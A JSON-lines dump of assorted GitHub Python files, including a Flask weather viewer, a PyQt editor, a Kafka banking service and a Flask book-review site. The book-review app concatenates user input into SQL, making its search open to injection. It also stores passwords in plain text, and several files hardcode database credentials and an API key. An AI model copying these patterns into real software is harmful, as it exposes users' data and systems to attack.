self._defaults['ai.location.ip'] and 'ai.location.ip' in self._values:\n del self._values['ai.location.ip']\n else:\n self._values['ai.location.ip'] = value\n \n def _initialize(self):\n \"\"\"Initializes the current instance of the object.\n \"\"\"\n pass\n \n def write(self):\n \"\"\"Writes the contents of this object and returns the content as a dict object.\n \n Returns:\n (dict). the object that represents the same data as the current instance.\n \"\"\"\n return _write_complex_object(self._defaults, self._values)\n\n","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/applicationinsights/channel/contracts/Location.py","file_name":"Location.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13821595194","text":"from flask import Flask, jsonify, render_template\nfrom flask_pymongo import PyMongo\nimport pymongo\nimport sys\nimport json\n\n\napp = Flask(__name__)\n\napp.config['MONGO_URI'] = 'mongodb://Aline1:aline1@ds061355.mlab.com:61355/heroku_njkl5bj0'\nmongo = PyMongo(app)\n\n@app.route(\"/\")\ndef get_time():\n time = mongo.db.time_record\n output = [] \n for t in time.find() :\n output.append({'absolute_humidity_2m:gm3': t['absolute_humidity_2m:gm3'], 'clear_sky_rad:W': t['clear_sky_rad:W'],\n 'dew_point_2m:C': t['dew_point_2m:C'], 'diffuse_rad:W': t['diffuse_rad:W'], 'diffuse_rad:W': t['diffuse_rad:W'],\n 'diffuse_rad_1h:Ws': t['diffuse_rad_1h:Ws'], 'direct_rad:W': t['direct_rad:W'], 'direct_rad_1h:Ws': t['direct_rad_1h:Ws'],\n 'dust_0p03um_0p55um:ugm3': t['dust_0p03um_0p55um:ugm3'], 'dust_0p55um_0p9um:ugm3': t['dust_0p55um_0p9um:ugm3'],\n 'dust_0p9um_20um:ugm3': t['dust_0p9um_20um:ugm3'], 'effective_cloud_cover:p': t['effective_cloud_cover:p'], \n 'fresh_snow_1h:cm': t['fresh_snow_1h:cm'], 'frost_depth:cm': t['frost_depth:cm'], 'global_rad:W': t['global_rad:W'], \n 'global_rad_1h:Ws': t['global_rad_1h:Ws'],'high_cloud_cover:p': t['high_cloud_cover:p'], 'is_fog_1h:idx': t['is_fog_1h:idx'],\n 'is_rain_1h:idx': t['is_rain_1h:idx'], 'is_sleet_1h:idx': t['is_sleet_1h:idx'],\n 'is_snow_1h:idx': t['is_snow_1h:idx'],'low_cloud_cover:p': t['low_cloud_cover:p'], 'medium_cloud_cover:p': t['medium_cloud_cover:p'],\n 'neff:p': t['neff:p'], 'pm1:ugm3': t['pm1:ugm3'], 'pm2p5:ugm3': t['pm2p5:ugm3'], 'precip_1h:mm': t['precip_1h:mm'],\n 'prob_precip_1h:p': t['prob_precip_1h:p'], 'relative_humidity_2m:p': t['relative_humidity_2m:p'], 'sfc_pressure_mean_1h:hPa': t['sfc_pressure_mean_1h:hPa'],\n 'snowdepth:cm': t['snowdepth:cm'],'snow_melt_1h:mm': t['snow_melt_1h:mm'],'sunrise:sql': t['sunrise:sql'],\n 'sunset:sql': t['sunset:sql'],'sunshine_duration_1h:min': t['sunshine_duration_1h:min'],'t_0m:C': t['t_0m:C'],\n 't_2m:C': t['t_2m:C'],'t_max_0m_1h:C': t['t_max_0m_1h:C'],'t_mean_0m_1h:C': t['t_mean_0m_1h:C'], \n 't_min_0m_1h:C': t['t_min_0m_1h:C'],'total_cloud_cover:p': t['total_cloud_cover:p'],'wet_bulb_t_2m:C': t['wet_bulb_t_2m:C'],\n 'wind_dir_10m:d': t['wind_dir_10m:d'],'wind_dir_mean_10m_1h:d': t['wind_dir_mean_10m_1h:d'],'wind_gusts_10m:ms': t['wind_gusts_10m:ms'],\n 'wind_speed_10m:ms': t['wind_speed_10m:ms'],'wind_speed_mean_10m_1h:ms': t['wind_speed_mean_10m_1h:ms'],\n 'wind_speed_u_10m:ms': t['wind_speed_u_10m:ms'], \n 'wind_speed_v_10m:ms': t['wind_speed_v_10m:ms']}) \n \n return render_template ('index.html', result=output)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ajaimes07/shared","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13748631555","text":"from functools import reduce\nclass Normalizer(object):\n def __init__(self):\n self.mask = [\n 0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80\n ]\n\n def norm(self, number):\n return map(lambda m: 0.9 if number & m else 0.1, self.mask)\n\n def denorm(self, vec):\n binary = map(lambda i: 1 if i > 0.5 else 0, vec)\n list_binary = list(binary)\n list_mask = list(self.mask)\n for i in range(len(list_mask)):\n list_binary[i] = list_binary[i] * list_mask[i]\n return reduce(lambda x, y: x + y, list_binary)\n\n","repo_name":"chris1132/Py_Projects_git","sub_path":"my_deeplearning_algorithm/bp/NormalizerClass.py","file_name":"NormalizerClass.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35839912320","text":"# mathesis.cup.gr\n# N. Αβούρης: Εισαγωγή στην Python\n# Μάθημα 12. Functions\n\n'''12.3 Να κατασκευάσετε πρόγραμμα που καλεί συνάρτηση\nπου μετράει τα κεφαλαία και μικρά γράμματα σε μια φράση.\n'''\n\ndef count_capital_small(s):\n count_capital = 0\n count_small = 0\n for c in s:\n if c.isalpha():\n if c.lower() == c :\n count_small += 1\n else :\n count_capital += 1\n return count_capital, count_small\n\nst = input(\"φράση:\")\nprint(count_capital_small(st))\n","repo_name":"navouris/python_mathesis_course","sub_path":"code/week3/12_functions/12_3.py","file_name":"12_3.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"el","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"19490269769","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QFont\nfrom PyQt5 import uic\n\nclass SHcode(QMainWindow):\n def __init__(self):\n super(SHcode, self).__init__()\n uic.loadUi('SHcode.ui', self)\n self.show()\n\n self.setWindowTitle(\"SHcode\")\n\n #change font size\n self.action12pt.triggered.connect(lambda: self.change_size(12))\n self.action18pt.triggered.connect(lambda: self.change_size(18))\n self.action24pt.triggered.connect(lambda: self.change_size(24))\n\n #file action's\n self.actionopen.triggered.connect(self.open_file)\n self.actionsave.triggered.connect(self.save_file)\n self.actionclose.triggered.connect(exit)\n\n def change_size(self, size):\n self.plainTextEdit.setFont(QFont(\"Arial\", size))\n\n def open_file(self):\n options = QFileDialog.Options()\n filename, _ = QFileDialog.getOpenFileName(\n self,\n \"Open File\",\n \"\",\n \"Text Files (*.txt);;Python Files (*.py);;Yolang Files (*.yo)\",\n options = options\n )\n if filename != \"\":\n with open(filename, \"r\") as f:\n self.plainTextEdit.setPlainText(f.read())\n\n def save_file(self):\n options = QFileDialog.Options()\n filename, _ = QFileDialog.getSaveFileName(\n self,\n \"Save File\",\n \"\",\n \"Text Files (*.txt);;Python Files (*.py);;Yolang Files (*.yo);;All Files(*)\",\n options = options\n )\n if filename != \"\":\n with open(filename, \"w\") as f:\n f.write(self.plainTextEdit.toPlainText())\n\n def closeEvent(self, event):\n dialog = QMessageBox()\n dialog.setText(\"Do you want to save your file?\")\n\n #add buttons\n dialog.addButton(QPushButton(\"yes\"), QMessageBox.YesRole) #0\n dialog.addButton(QPushButton(\"no\"), QMessageBox.NoRole) #1\n dialog.addButton(QPushButton(\"cancel\"), QMessageBox.RejectRole) #2\n\n answer = dialog.exec_()\n\n if answer == 0:\n self.save_file()\n elif answer == 2:\n event.ignore()\n\ndef main():\n app = QApplication([])\n window = SHcode()\n app.exec_()\n\nif __name__ == '__main__':\n main()\n","repo_name":"shahriaarrr/SHcode","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"35317818375","text":"import uuid\nfrom decimal import Decimal\nfrom http.client import OK\nfrom typing import List, Optional\n\nfrom django.conf import settings\nfrom django.db import IntegrityError\nfrom notbank.transactions.models.current_deposit import CurrentDeposit\nfrom notbank.base.exceptions import (ConversionAlreadyRunningException, DepositAlreadyRunningException, QuoteNotFoundException, NotBankKafkaException,\n TransferRequestAlreadyCommitedException,\n TransferRequestNotFoundException, UserNotFoundException)\nfrom notbank.base.utils.kafka.producer import Producer\nfrom notbank.base.utils.kafka.tramas.nanobanco_quote import NanoBancoQuote\nfrom notbank.base.utils.time import datetime_from_timestamp, get_timestamp\nfrom notbank.transactions.models import (\n CurrentConversion, CurrentTransfer, Quote, Transfer, TransferRequest, User)\nfrom notbank.transactions.models.conversion import Conversion\n\n\ndef new_transfer(\n from_user: str,\n to_user: str,\n currency: str,\n amount: str,\n fee_amount: str,\n description: str\n) -> str:\n transfer = Transfer(\n created_at=datetime_from_timestamp(get_timestamp()),\n task_id=str(uuid.uuid4()),\n from_user=User.objects.get(uuid=from_user),\n to_user=User.objects.get(uuid=to_user),\n currency=currency,\n amount=amount,\n fee_amount=fee_amount,\n description=description,\n )\n CurrentTransfer(task_id=transfer.task_id).save()\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=transfer.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank-sync kafka topic\")\n\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n message=transfer.to_balance_manager_task_trama()\n )\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to balance-manager-task kafka topic\")\n return transfer.task_id\n\n\ndef get_conversion(\n from_user_uuid: str,\n from_asset: str,\n from_amount: str,\n to_asset: str,\n fee_amount: str\n) -> str:\n trama_data = NanoBancoQuote(\n timestamp=get_timestamp(),\n django_user_ID=from_user_uuid,\n from_currency=from_asset,\n to_currency=to_asset,\n from_amount=from_amount,\n request_id=str(uuid.uuid4()),\n fee_amount=fee_amount,\n )\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_QUOTE_SERVICE_NANOBANCO_QUOTE,\n message=trama_data.to_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to TODO:SOME-TOPIC kafka topic\") # TODO: not use some topic\n\n\ndef execute_conversion(*, user_uuid: str, request_id: str, fee_amount: str, description: str):\n try:\n CurrentConversion(request_id=request_id).save()\n except IntegrityError:\n raise ConversionAlreadyRunningException()\n try:\n quote: Quote = Quote.objects.get(request_id=request_id)\n # TODO: should be deleted in all instances (in a task after sync)\n except Quote.DoesNotExist:\n raise QuoteNotFoundException()\n try:\n user = User.objects.get(uuid=user_uuid)\n except User.DoesNotExist:\n raise UserNotFoundException()\n conversion = Conversion(\n task_id=uuid.uuid4(),\n user=user,\n from_currency=quote.from_currency,\n from_amount=quote.from_amount,\n to_currency=quote.to_currency,\n fee_amount=Decimal(fee_amount),\n description=description,\n )\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=conversion.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank-sync kafka topic\")\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n message=conversion.to_balance_manager_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to balance-manager-task kafka topic\")\n return conversion.task_id\n\n\n\ndef deposit(*, user_uuid: str, request_id: str, currency: str, amount: str, fee: str):\n try:\n CurrentDeposit(request_id=request_id).save()\n except IntegrityError:\n raise DepositAlreadyRunningException()\n try:\n quote: Quote = Quote.objects.get(request_id=request_id)\n # TODO: should be deleted in all instances (in a task after sync)\n except Quote.DoesNotExist:\n raise QuoteNotFoundException()\n try:\n user = User.objects.get(uuid=user_uuid)\n except User.DoesNotExist:\n raise UserNotFoundException()\n conversion = Conversion(\n task_id=uuid.uuid4(),\n user=user,\n from_currency=quote.from_currency,\n from_amount=quote.from_amount,\n to_currency=quote.to_currency,\n fee_amount=Decimal(fee),\n )\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=conversion.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank-sync kafka topic\")\n \n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n message=conversion.to_balance_manager_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to balance-manager-task kafka topic\")\n return conversion.task_id\n\n\ndef get_quote(*, request_id: str) -> Optional[Quote]:\n try:\n return Quote.objects.get(request_id=request_id)\n except Quote.DoesNotExist:\n return None\n\n\ndef get_current_conversions(*, status: str, creation_date: str) -> List[CurrentConversion]:\n if status:\n return list(CurrentConversion.objects.filter(active=status).order_by('-created_at'))\n if creation_date:\n return list(CurrentConversion.objects.filter(created_at=creation_date).order_by('-created_at'))\n\n\ndef get_transfer_request_list_of_user(*, user_uuid: str) -> List[TransferRequest]:\n return list(TransferRequest.objects.filter(transaction__to_user__user_uuid=user_uuid))\n\n\ndef get_transfer_of_user(*, user_uuid: str) -> List[Transfer]:\n return list(Transfer.objects.filter(from_user__uuid=user_uuid))\n\n\ndef get_all_transfers(*, status: str, creation_date: str) -> List[Transfer]:\n if status:\n return list(Transfer.objects.filter(status=status).order_by('-amount'))\n if creation_date:\n return list(Transfer.objects.filter(created_at=creation_date).order_by('-amount'))\n\n\ndef sync_transfer_request(\n transfer_request: TransferRequest\n) -> None:\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=transfer_request.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank internal kafka topic\")\n return\n\n\ndef sync_new_transfer_request(\n from_user_uuid: str,\n to_user_uuid: str,\n currency: str,\n amount: str,\n fee_amount: str,\n description: str,\n) -> None:\n transfer_request = TransferRequest(\n transfer=Transfer(\n task_id=uuid.uuid4(),\n from_user=User.objects.get(uuid=from_user_uuid),\n to_user=User.objects.get(uuid=to_user_uuid),\n currency=currency,\n amount=Decimal(amount),\n fee_amount=Decimal(fee_amount),\n description=description,\n ),\n status=TransferRequest.STATUS.PENDING,\n )\n sync_transfer_request(transfer_request)\n\n\ndef accept_or_reject_transfer_request(task_id: str, accept: bool):\n try:\n transfer_request: TransferRequest = TransferRequest.objects.get(\n task_id=task_id\n )\n except TransferRequest.DoesNotExist:\n raise TransferRequestNotFoundException()\n\n if transfer_request.status != transfer_request.STATUS.PENDING:\n raise TransferRequestAlreadyCommitedException()\n if accept:\n # we only send to balance manager when the transfer is accepted\n # timestamp here is the time of the transaction (now)\n # not the time of the creation of the transfer (transfer.created_at)\n transfer: Transfer = transfer_request.transfer\n balance_manager_task = transfer.to_balance_manager_task()\n balance_manager_task.timestamp = get_timestamp()\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n message=balance_manager_task.to_trama(),\n )\n if not sended:\n raise NotBankKafkaException(\n 'failed to send kafka message to balance manager task topic')\n # we always propagate\n new_status = {\n True: TransferRequest.STATUS.ACCEPTED,\n False: TransferRequest.STATUS.REJECTED,\n }\n transfer_request.status = new_status[accept]\n sync_transfer_request(transfer_request)\n","repo_name":"cjmont/crypto_conversion_kafka","sub_path":"backend/notbank/transactions/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7902061895","text":"from app.database.queries import connect_to_db\nimport pandas as pd\n\n#Run this code to update the draft_picks table with the budget_percent, draft_value and budget_amount columns\n\n# Load your CSV data into a DataFrame\ndf = pd.read_csv(r\"C:\\Users\\Admin\\Desktop\\FFLBot\\GPT_FFL\\River_City_Draft_Data.csv\", dtype={'draft_id':str})\n\n# Filter data from 2018 onwards and drop any rows that contain null values in Owner_id, League_id or player_id\ndf = df[df['Season'] >= 2018]\ndf = df.dropna(subset=['Owner_id', 'League_id', 'player_id'])\n\nfrom app.database.queries import connect_to_db\n\ndef update_draft_picks_with_budget_percent(df):\n # Use the existing connect_to_db function to establish a connection to the PostgreSQL database\n conn, cur = connect_to_db()\n\n # Iterate through the rows of the DataFrame\n for _, row in df.iterrows():\n # Define the SQL query for updating the draft_picks table\n query = \"\"\"\n UPDATE draft_picks\n SET budget_percent = %s, draft_value = %s, budget_amount = %s\n WHERE player_id = %s AND picked_by = %s AND draft_id = %s\n \"\"\"\n # Execute the SQL query with the data from the DataFrame row\n # Convert Owner_id, League_id and draft_id to strings\n cur.execute(query, (row['Budget%'], row['Draft Value'], row['Budget'], row['Owner'], row['player_id'], str(row['Owner_id']), str(row['draft_id'])))\n \n # Check how many rows were affected\n rows_affected = cur.rowcount\n if rows_affected == 0:\n print(f\"No rows updated for player_id {row['player_id']}, picked_by {str(row['Owner_id'])}, draft_id {str(row['draft_id'])}\")\n else:\n print(f\"{rows_affected} row(s) updated for player_id {row['player_id']}, picked_by {str(row['Owner_id'])}, draft_id {str(row['draft_id'])}\")\n \n # Commit the changes and close the connection\n conn.commit()\n cur.close()\n conn.close()\n\n # Call the function with your DataFrame\n update_draft_picks_with_budget_percent(df)","repo_name":"wcameron14/FFLAnalyzer","sub_path":"archive/add_draft_data.py","file_name":"add_draft_data.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39556981133","text":"#This Python Application is Written By Mohammed Zahid Wadiwale\nimport os\nfrom flask import Flask, session\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom flask import Flask, render_template, flash, redirect, request, abort, url_for, jsonify\nimport json\nimport requests\n\napp = Flask(__name__)\napp.config['DATABASE_URL'] = \"postgres://nkweeotaiaocev:cd2afe545b2364432178fb4333d2f6aa12c74bd0bb1ba1804840a93cc218a23c@ec2-79-125-26-232.eu-west-1.compute.amazonaws.com:5432/daqdsbbqpv9hrd\"\nos.environ[\"DATABASE_URL\"] = \"postgres://nkweeotaiaocev:cd2afe545b2364432178fb4333d2f6aa12c74bd0bb1ba1804840a93cc218a23c@ec2-79-125-26-232.eu-west-1.compute.amazonaws.com:5432/daqdsbbqpv9hrd\"\napp.secret_key = os.urandom(24) \n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"), pool_size=10, max_overflow=10)\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\")\ndef index():\n\tif not session.get('logged_in'):\n\t\treturn home()\n\telse:\n\t\treturn render_template(\"index.html\")\n@app.route(\"/home\")\ndef home():\n\tif not session.get('logged_in'):\n\t\treturn render_template(\"index2.html\")\n\telse:\n\t\treturn index()\n@app.route(\"/logout\")\ndef logout():\n\tif session.get('logged_in'):\n\t\tsession.clear()\n\t\treturn index()\n@app.route(\"/login\", methods=['POST','GET'])\ndef login():\n\tif session.get('logged_in'):\n\t\treturn index()\n\terror = None\n\tif request.method == 'POST':\n\t\temail=request.form['email']\n\t\tpassword=request.form['password']\n\t\tlogon=db.execute(\"SELECT * FROM bookuser WHERE email=:it AND password=:itf\",{\"it\":email,\"itf\":password}).fetchone()\n\t\tif logon is None:\n\t\t\terror = 'Invalid Credentials. Please try again.'\n\t\telse:\n\t\t\tsession['logged_in'] = request.form['email']\n\t\t\treturn redirect(url_for('index'))\n\treturn render_template('login.html', error=error)\n@app.route(\"/registar\", methods=['POST','GET'])\ndef registar():\n\tif session.get('logged_in'):\n\t\treturn index()\n\terror = None\n\tif request.method == 'POST':\n\t\temail=request.form['email']\n\t\tname=request.form['name']\n\t\tpassword=request.form['password']\n\t\tlogon2=db.execute(\"SELECT * FROM bookuser WHERE email=:it\",{\"it\":email}).fetchone()\n\t\tif logon2 is not None:\n\t\t\terror = 'This Email Already Exist'\n\t\telse:\n\t\t\tdb.execute(\"INSERT INTO bookuser (name,email,password) VALUES (:name,:email,:password)\",{'name':name,'email':email,'password':password})\n\t\t\tdb.commit()\n\t\t\treturn render_template('login.html', message=\"Account Sucessfully Created Now Login\")\n\treturn render_template('registar.html', error=error)\n@app.route(\"/search\", methods=['POST','GET'])\ndef search():\n\n\tif request.method=='POST':\n\t\terror=None\n\t\tsearchit=request.form['k']\n\t\tsearch=db.execute(\"SELECT * FROM books WHERE author LIKE '%\"+searchit+\"%' OR title LIKE '%\"+searchit+\"%' OR isbn LIKE '%\"+searchit+\"%'\")\n\t\tif search is None:\n\t\t\terror=\"No Results Found!\"\n\t\tif session.get('logged_in'):\n\t\t\treturn render_template('search.html', error=error,search=search,string=searchit)\n\t\telse:\n\t\t\treturn render_template('search2.html', error=error,search=search,string=searchit)\n@app.route(\"/isbn/\",methods=[\"GET\",\"POST\"])\ndef book(isbn):\n\tchechit=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tif chechit==None:\n\t\treturn render_template('404.html')\n\tif not session.get('logged_in'):\n\t\treturn login()\n\terror=\"\"\n\temail=session.get('logged_in')\n\tsecondreview=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email= :email\",{\"email\":email,\"isbn\":isbn}).fetchone()\n\tdata=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"YdT8QcJWE6ZvnDjMKIZgA\", \"isbns\": isbn})\n\taverage_rating=res.json()['books'][0]['average_rating']\n\twork_ratings_count=res.json()['books'][0]['work_ratings_count']\n\tif request.method==\"POST\" and secondreview!=None:\n\t\terror=\"Sorry. You cannot add second review.\"\n\t\treviews=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email=:email\",{\"isbn\":isbn,\"email\":email}).fetchall()\n\telif request.method==\"GET\" and secondreview!=None:\n\t\treviews=db.execute(\"SELECT * FROM reviews WHERE isbn = :isbn AND email=:email\",{\"isbn\":isbn,\"email\":email}).fetchall()\n\t\treturn render_template('book.html',data=data,email=email,error=error,reviews=reviews,average_rating=average_rating,rcounts=work_ratings_count)\n\telse:\n\t\treviews=None\n\tif request.method==\"POST\" and secondreview==None:\n\t\treview=request.form.get('textarea')\n\t\trating=request.form.get('stars')\n\t\tdb.execute(\"INSERT INTO reviews (isbn, review, rating, email) VALUES (:a,:b,:c,:d)\",{\"a\":isbn,\"b\":review,\"c\":rating,\"d\":email})\n\t\tdb.commit()\n\t\treturn book(isbn)\n\treturn render_template('book.html',data=data,email=email,error=error,reviews=reviews,average_rating=average_rating,rcounts=work_ratings_count)\n@app.route(\"/api/\")\ndef api(isbn):\n\tif not session.get('logged_in'):\n\t\treturn login()\n\tdata=db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{\"isbn\":isbn}).fetchone()\n\tif data!=None:\n\t\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"YdT8QcJWE6ZvnDjMKIZgA\", \"isbns\": isbn})\n\t\taverage_rating=res.json()['books'][0]['average_rating']\n\t\twork_ratings_count=res.json()['books'][0]['work_ratings_count']\n\t\tx = {\n\t\t\"title\": data.title,\n\t\t\"author\": data.author,\n\t\t\"year\": data.year,\n\t\t\"isbn\": isbn,\n\t\t\"review_count\": work_ratings_count,\n\t\t\"average_score\": average_rating\n\t\t}\n\t\tapi=json.dumps(x)\n\telse:\n\t\treturn jsonify({\"error\":\"Invalid ISBN\"}),422\n\treturn render_template(\"api.json\",api=api)\n","repo_name":"ZahidServers/Harvard-CS50-Project1-GoodReadsClone","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}